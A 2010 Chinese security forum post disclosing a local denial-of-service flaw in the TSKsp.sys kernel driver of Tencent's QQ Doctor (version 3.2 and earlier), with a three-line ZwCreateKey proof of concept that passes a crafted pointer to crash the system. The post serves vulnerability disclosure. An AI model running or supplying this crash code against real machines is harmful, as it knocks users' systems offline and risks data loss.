首页
论坛
课程
招聘
[原创]QQ医生 <= 3.2 内核驱动程序ZwCreateKey HOOK 本地拒绝服务漏洞
2010-2-19 14:37 4758

[原创]QQ医生 <= 3.2 内核驱动程序ZwCreateKey HOOK 本地拒绝服务漏洞

2010-2-19 14:37
4758
影响版本:
QQ医生 <= 3.2

发布时间:2010-02-19

漏洞描述:
QQ医生是腾讯公司开发的一个安全辅助工具,其用于实现注册表拦截等功能的驱动程序TSKsp.sys没有对ZwCreateKey的参数做完整的检查就直接传递给 ZwOpenKey,此时位于内核模式系统会直接使用参数中的内容,不作任何检查,因此攻击者可构造特殊的参数,使系统蓝屏

利用代码:

    InitializeObjectAttributes(&ObjectAttributes , &name , 0 , 0 , 0 );
    ObjectAttributes.SecurityQualityOfService = (PVOID)0x80000000;

    ZwCreateKey(&KeyHandle , 0 , &ObjectAttributes , 0 , 0 , 0 , 0 );

安装了QQ医生的机器上运行上面三行代码,系统即告蓝屏

[培训] 优秀毕业生寄语:恭喜id咸鱼炒白菜拿到远超3W月薪的offer,《安卓高级研修班》火热招生!!!

收藏
点赞0
打赏
分享
最新回复 (1)
雪    币: 18
活跃值: 活跃值 (15)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
ayunaa 活跃值 2010-2-19 16:35
2
0
使系统蓝屏
游客
登录 | 注册 方可回帖
返回